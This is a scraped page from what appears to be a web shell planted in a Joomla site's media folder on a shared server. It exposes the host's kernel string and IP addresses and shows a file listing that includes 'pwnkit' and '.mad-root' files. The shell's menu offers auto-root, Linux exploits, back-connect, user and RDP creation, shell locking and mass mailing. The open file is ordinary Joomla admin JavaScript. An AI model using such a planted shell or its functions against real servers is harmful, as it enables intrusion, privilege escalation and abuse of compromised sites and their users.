Linux webm002.cluster120.gra.hosting.ovh.net 6.18.42-ovh-vps-grsec-zfs+ #1 SMP PREEMPT_DYNAMIC Wed Aug 5 15:59:48 CEST 2026 x86_64
Apache
: 10.120.20.2 | : 216.73.216.49
Cant Read [ /etc/named.conf ]
8.5.7
verseaumee
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
home /
verseaumee /
zenit /
media /
com_menus /
js /
[ HOME SHELL ]
Name
Size
Permission
Action
.mad-root
0
B
-rw-r--r--
admin-item-edit-es5.js
4.33
KB
-rw----r--
admin-item-edit-es5.min.js
2.7
KB
-rw----r--
admin-item-edit-es5.min.js.gz
872
B
-rw----r--
admin-item-edit.js
4.01
KB
-rw----r--
admin-item-edit.min.js
2.62
KB
-rw----r--
admin-item-edit.min.js.gz
863
B
-rw----r--
admin-item-edit_container-es5....
1.65
KB
-rw----r--
admin-item-edit_container-es5....
583
B
-rw----r--
admin-item-edit_container-es5....
301
B
-rw----r--
admin-item-edit_container.js
1.24
KB
-rw----r--
admin-item-edit_container.min....
464
B
-rw----r--
admin-item-edit_container.min....
281
B
-rw----r--
admin-item-edit_modules-es5.js
3.44
KB
-rw----r--
admin-item-edit_modules-es5.mi...
1.98
KB
-rw----r--
admin-item-edit_modules-es5.mi...
674
B
-rw----r--
admin-item-edit_modules.js
3.15
KB
-rw----r--
admin-item-edit_modules.min.js
1.88
KB
-rw----r--
admin-item-edit_modules.min.js...
659
B
-rw----r--
admin-item-modal-es5.js
613
B
-rw----r--
admin-item-modal-es5.min.js
305
B
-rw----r--
admin-item-modal-es5.min.js.gz
217
B
-rw----r--
admin-item-modal.js
531
B
-rw----r--
admin-item-modal.min.js
267
B
-rw----r--
admin-item-modal.min.js.gz
198
B
-rw----r--
admin-items-modal-es5.js
2.61
KB
-rw----r--
admin-items-modal-es5.min.js
1.3
KB
-rw----r--
admin-items-modal-es5.min.js.g...
484
B
-rw----r--
admin-items-modal.js
2.42
KB
-rw----r--
admin-items-modal.min.js
1.25
KB
-rw----r--
admin-items-modal.min.js.gz
468
B
-rw----r--
admin-menus-default-es5.js
1.09
KB
-rw----r--
admin-menus-default-es5.min.js
556
B
-rw----r--
admin-menus-default-es5.min.js...
339
B
-rw----r--
admin-menus-default.js
965
B
-rw----r--
admin-menus-default.min.js
484
B
-rw----r--
admin-menus-default.min.js.gz
316
B
-rw----r--
default-batch-body-es5.js
791
B
-rw----r--
default-batch-body-es5.min.js
268
B
-rw----r--
default-batch-body-es5.min.js....
190
B
-rw----r--
default-batch-body.js
692
B
-rw----r--
default-batch-body.min.js
241
B
-rw----r--
default-batch-body.min.js.gz
179
B
-rw----r--
pwnkit
0
B
-rwxr-xr-x
Delete
Unzip
Zip
${this.title}
Close
Code Editor : admin-item-edit.js
/** * @copyright (C) 2018 Open Source Matters, Inc. <https://www.joomla.org> * @license GNU General Public License version 2 or later; see LICENSE.txt */ (Joomla => { Joomla.submitbutton = (task, type) => { if (task === 'item.setType' || task === 'item.setMenuType') { if (task === 'item.setType') { const list = [].slice.call(document.querySelectorAll('#item-form input[name="jform[type]"]')); list.forEach(item => { item.value = type; }); document.getElementById('fieldtype').value = 'type'; } else { const list = [].slice.call(document.querySelectorAll('#item-form input[name="jform[menutype]"]')); list.forEach(item => { item.value = type; }); } Joomla.submitform('item.setType', document.getElementById('item-form')); } else if (task === 'item.cancel' || document.formvalidator.isValid(document.getElementById('item-form'))) { Joomla.submitform(task, document.getElementById('item-form')); } else { // special case for modal popups validation response const list = [].slice.call(document.querySelectorAll('#item-form .modal-value.invalid')); list.forEach(field => { const idReversed = field.getAttribute('id').split('').reverse().join(''); const separatorLocation = idReversed.indexOf('_'); const nameId = `${idReversed.substr(separatorLocation).split('').reverse().join('')}name`; document.getElementById(nameId).classList.add('invalid'); }); } }; const onChange = ({ target }) => { const menuType = target.value; Joomla.request({ url: `index.php?option=com_menus&task=item.getParentItem&menutype=${menuType}`, headers: { 'Content-Type': 'application/json' }, onSuccess(response) { const data = JSON.parse(response); const list = [].slice.call(document.querySelectorAll('#jform_parent_id option')); list.forEach(item => { if (item.value !== '1') { item.parentNode.removeChild(item); } }); data.forEach(value => { const option = document.createElement('option'); option.innerText = value.title; option.id = value.id; document.getElementById('jform_parent_id').appendChild(option); }); const newEvent = document.createEvent('HTMLEvents'); newEvent.initEvent('change', true, false); document.getElementById('jform_parent_id').dispatchEvent(newEvent); }, onError: xhr => { Joomla.renderMessages(Joomla.ajaxErrorsMessages(xhr)); } }); }; if (!Joomla || typeof Joomla.request !== 'function') { throw new Error('core.js was not properly initialised'); } const element = document.getElementById('jform_menutype'); if (element) { element.addEventListener('change', onChange); } // Menu type Login Form specific document.getElementById('item-form').addEventListener('submit', () => { if (document.getElementById('jform_params_login_redirect_url') && document.getElementById('jform_params_logout_redirect_url')) { // Login if (!document.getElementById('jform_params_login_redirect_url').closest('.control-group').classList.contains('hidden')) { document.getElementById('jform_params_login_redirect_menuitem_id').value = ''; } if (!document.getElementById('jform_params_login_redirect_menuitem_name').closest('.control-group').classList.contains('hidden')) { document.getElementById('jform_params_login_redirect_url').value = ''; } // Logout if (!document.getElementById('jform_params_logout_redirect_url').closest('.control-group').classList.contains('hidden')) { document.getElementById('jform_params_logout_redirect_menuitem_id').value = ''; } if (!document.getElementById('jform_params_logout_redirect_menuitem_id').closest('.control-group').classList.contains('hidden')) { document.getElementById('jform_params_logout_redirect_url').value = ''; } } }); })(Joomla);
Close